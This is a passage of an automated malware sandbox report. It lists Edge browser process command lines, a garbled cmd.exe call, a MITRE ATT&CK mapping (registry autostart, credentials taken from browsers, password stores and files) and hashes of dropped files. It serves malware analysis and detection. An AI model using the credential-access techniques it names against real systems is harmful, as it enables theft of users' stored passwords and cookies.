C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5652,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5636 /prefetch:144⤵PID:2808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5752,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5760 /prefetch:144⤵PID:5932
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.execookie_exporter.exe --cookie-json=11285⤵PID:1792
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=6324,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6368 /prefetch:14⤵PID:4472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=3428,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=3452 /prefetch:14⤵PID:416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5676,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=3632 /prefetch:144⤵PID:1468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5736,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6528 /prefetch:144⤵PID:4588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3652,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6500 /prefetch:144⤵PID:2132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=3404,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6484 /prefetch:14⤵PID:1580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5888,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=2836 /prefetch:144⤵PID:2508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5952,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5520 /prefetch:144⤵PID:1776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=872,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6472 /prefetch:144⤵PID:5496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=5512,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5756 /prefetch:14⤵PID:5056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3592,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=3628 /prefetch:144⤵PID:3156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5780,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6472 /prefetch:104⤵
- Suspicious behavior: EnumeratesProcesses
PID:4152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3872,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5068 /prefetch:144⤵PID:6088
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:4908
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start1⤵PID:2988
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start2⤵PID:252
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ÔN@1⤵PID:488
Network
MITRE ATT&CK Enterprise v16
Privilege Escalation
Boot or Logon Autostart Execution 1
Registry Run Keys / Startup Folder 1
Credential Access
Credentials from Password Stores 1
Credentials from Web Browsers 1
Unsecured Credentials 1
Credentials In Files 1
Downloads
-
Filesize 17.5MB
MD5 ccdca87540e56b27f2b104bb036662ff
SHA1 36d79e579770a2e4f619b4c09e635c5d48ff56d5
SHA256 630f929545e8277fe3a65970a8ed8c6b8271e2c6446e23334e117fdcecf2c51d
SHA512 636e01d3633c5f1abb0736acaab01e3a7a8f7dfe6c919750fab5cfffb85419432829464963af1a4c2f35458a7ab32d2913efdc8beacfdfd2f605cbf82fcf1a37
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.24\autofill_bypass_cache_forms.json
Filesize 146B
MD5 9357a694006d8bec3d0f8c9607b76ff8
SHA1 6335ce691999ec10de742cd07d074eb648631259
SHA256 b6c37df977f149c5a444c72ea4469ce666c7975d34c6e2e0d9d8ec416f57dd44
SHA512 87c2d0192f3a78b13a691cda14da507f260d13331b792eb973869bd6dbd0f207faa48f68882be691641b46c06ed12ee8b9728a3b596df67a1f9a4831b4369a44
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.24\edge_autofill_global_block_list.json
Filesize 5KB
MD5 adb5f6058f82680a26d6ed02b44e5a21
SHA1 6197ee74e40c742e184357dcb6dfcc7e32818cae
SHA256 7655c9afb5f2ea39b18e302498b34009ca02b72451f82a6d4e7fb4d8d954f050
SHA512 742dd8f6eaf1bd5f24b37e90d7a3dce7bd0a8edf399c2dec25cd92d2bd6e1d663ebab3c68234812f0144061d4f22f0c2c43de890f60e24d93133bbfe23a6d1c5
-
Filesize 509KB
MD5 c1a0d30e5eebef19db1b7e68fc79d2be
SHA1 de4ccb9e7ea5850363d0e7124c01da766425039c
SHA256 f3232a4e83ffc6ee2447aba5a49b8fd7ba13bcfd82fa09ae744c44996f7fcdd1
SHA512 f0eafae0260783ea3e85fe34cc0f145db7f402949a2ae809d37578e49baf767ad408bf2e79e2275d04891cd1977e8a018d6eeb5b95e839083f3722a960ccb57a
-
Filesize 280B
MD5 03b6ceee6d3294b477cb96be0a4821a2
SHA1 17508a8b887dac0d5b2fdf62cce6ee7989564165
SHA256 e373291cec4f23986133c23daa353551f05eda26aac4a4e3686c40f8bfda576e
SHA512 581fbd959baff647df5ac757c03b071653bca94c529807775b30e0f4b88ade1f0dd99850daaea1fa0861ce83d3e9d505a004e6c78d45e923ee39728a2d9efda9
-
Filesize 2B
MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize 108KB
MD5 06d55006c2dec078a94558b85ae01aef
SHA1 6a9b33e794b38153f67d433b30ac2a7cf66761e6
SHA256 088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd
SHA512 ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60
-
Filesize 2KB
MD5 601cfc3d7104c6b0cae6658f98404383
SHA1 584fbd6f690483101daa0abbb64bc50b607fee75
SHA256 cc545cce17eaaddc438c9d415b453c52a2094d572c5544378778a1da9e4123dd
SHA512 ed5871a55bbec95c756ceec85f264de01d6149e614aae2ce4e3313c835a446be6b216d51c9860216fa99813f3e54b9f83e198911837626ea6260ba510c9d5a2a
-
Filesize 2KB
MD5 c16c998f4bbdddd1b8d7acafe29c3214
SHA1 4f203a019ee0681240820be3348bdd982d11c29c
SHA256 f4acda152b86656485bf0acfb5d8fd97332ca218154f575507019c3f27889112
SHA512 3b3febf39ecca70eb692e71791bea1a46a094b5173033ee6d6ad158c8fde24e32474b7b304c3cf02d93d098cfcf5410eebfedd333032ba3b710739a3b8f63ed6
-
Filesize 2B
MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize 40B
MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856
-
Filesize 17KB
MD5 2e98928ff585f8761f31526111a7aab8
SHA1 e681ae864d6c3cace37d72df875004b325ecdb9d
SHA256 8ac342a17e4d8bed45b06122f4569e7466d05737b45d2a30e1bb1c085e63517b
SHA512 744ebdd4dc2f8b4c9355a003dfd098224fd43adcbe99302c1f41defd3b9f094716bc32c722ced0bb6f4af90f47af0ceec2cb0cab9e919c9eac0f95361939cfde
-
Filesize 37KB
MD5 fd2bf8754a52c30c7c7c1d7859e89800
SHA1 b28e6d8d6bd4b7d3c17bfc82bf675b624b8126cf
SHA256 3a4c360ece19a6456a752c7c15cf99cc22661face959e5869aca823fa66838e1
SHA512 2b5584e744fe42436f45af8f975ec10443bd82bef713522a2d23c922c20d363483798c9b435baa4e9f015d9bca0761f0abaa4d2b276fc035179c2151667f2ad2
-
Filesize 22KB
MD5 934d6a13fbfb4ae8743c8261d8aa980a
SHA1 f1bd24c8a5791e92eec58d8947828b63c7bc8679
SHA256 ca374ed95b4bce8b5176da51d2bfb080840a791981d8139641dea874b7e582ac
SHA512 5ce3d1ebcca354fc9f04e1a1d0a9d1c0f4f79c6ad3051b6298ec3cc091d01e8967a53763e1860dda84bdffed3f5fc0565912a7ab4c639d9091a89ba2365db670
-
Filesize 462B
MD5 d5597e746878fede733d9c916085ff07
SHA1 ad6e79cff797c397c644cb90c43e61f0b91a11fd
SHA256 406b468eb7efa1329fd66e656e9fa68f1c4ac1876ea97776fb95df3318a2f646
SHA512 7f374420af238648aac379358db2fec66a9b5cb66b599c130f9fbf326103a30e2497052752618939fd55797bc62418b9a766c0cfb75470e52617d6b390b852e5
-
Filesize 45KB
MD5 147f513861d7e6b41a45891b5b30be87
SHA1 102b03bd3f45fb552e1ebc303306e72c0771d769
SHA256 f729c0824133c0a6260494772344a3b79cac90b70b02f8b87749118a39d9129f
SHA512 26d3c674cfc50e85cf59f81ab5ae924c55edcfd136df87912bb9afb7f975bd15d51c34a4c6632c859d8c66141821d049386ee820e804c83c8f3febf670f15ba5
-
Filesize
45KB
MD5338b5cb7cb7a0f02c6d5ec7e082f053d
SHA110853919c968311668dc0b0bad95ce50ff1f5652
SHA2560404a38573cdcc351d9ba19089cdfe690b824df42f86122d47dcee92992b1a4e
SHA5125659c6d1bae4f46e440d10f6e13dd6004aed6461befad1ab27791e44105a3dfae40d08259605cff6a05b89cb0dda4cd80fee681944c5ea82c5a603d7b66779b1
-
Filesize
38KB
MD5afd3c5ce0014b19ed9f1ab0ccb610ac4
SHA167092caede60e40d67327f50f6ff6849cae0b417
SHA256db7faba94361b022c851b0fa50e37af106c2402d975fc78553757a2793640d3f
SHA512c300b1fa73ec915f4ef62d2e3970838d1dc1c63dd72ea9f1d3d7f7e29c61583e205c1710d15237b4f276722e50fa4a7e47545153b4889bc966ebcbe576f085f9
-
Filesize
38KB
MD5cdff623fbbb16b2e2df2d00641ce4ea7
SHA18cd0b1c131528360fd588f4039c2fd1f6bfd5268
SHA2565b6f714d384580984a4396f04997e09ee8619d2e2e8780472c911c1368c81479
SHA512fc1067edbd3afb30765e039fbf436800b434631bd581bc2854db3a6dd263fbc5dbd68846de39d969091902198ded6228a4b012e54737b40a3de35072a42b6681
-
Filesize
45KB
MD53215d72304efe38cbdcedaf22c170a8a
SHA1a18bd9209c3d4c7f06710491aac0cf99fed1d04f
SHA25675f5eeeb175e1c37ea1022bb9426fc33f0c761ac30fb09599493d0ce08f671ee
SHA512d3b2b688e6e7839784730b0a8badafee99f799a50af383cd9690f3ca1b037de156cb2a2091160242658a4c6bc9509721c098c556a225cf2eb028b98a26136d42
-
Filesize
1KB
MD5ee002cb9e51bb8dfa89640a406a1090a
SHA149ee3ad535947d8821ffdeb67ffc9bc37d1ebbb2
SHA2563dbd2c90050b652d63656481c3e5871c52261575292db77d4ea63419f187a55b
SHA512d1fdcc436b8ca8c68d4dc7077f84f803a535bf2ce31d9eb5d0c466b62d6567b2c59974995060403ed757e92245db07e70c6bddbf1c3519fed300cc5b9bf9177c
-
Filesize
84B
MD5e0909520982fc48e47a6451443b11741
SHA10e46425274933c153ebf5a03f25e693267a8cea2
SHA2562e9e6138305d702f3c9b89d6e9dc4931b548c69bb86db64e585fa2e37b8ef654
SHA5123fdf504cb0bf39a807fa15a8ec31a6efd8083888692935ec31d70b4ef6eef89b8527c6a75a46bf7ae3efeeaa507ac3c7cccda5246a2f073ac603a7ffa10d20a8
-
Filesize
119B
MD5390af74c5ae643320cad0cef4fa8fee1
SHA122ce727f9bcff9a914eb1d58ba8384de6fbda7e1
SHA2561148c28e540b9b96237b35170a547a13165d6c7c039b8fff9e4b2cd774b92f5a
SHA512deaeeeffdddea1a9047e97d82e3bb701fb865adcd77ef9e985bb0ec5e4057155e7b83cad4f9f3dd256edf89f19d1075349cea5005dffff8420da4d0646be413a
-
Filesize
176B
MD58177721150435a9b333475e2b8a6e691
SHA18aa8981617e8f3d8967a0a4a2d20315317eba293
SHA2568a4800ed5f63b9371a024c501ee2b031af94539e32e6753214e6d99c625c018c
SHA512540c4c52030c6a4e1efcfab5eb59760c696bb3e3f1b8f93c97a6368639a911ba3d395190fc0798d99f3c63e25b6dcf2ded482bbda34d36ddd874dd20c2cfdf74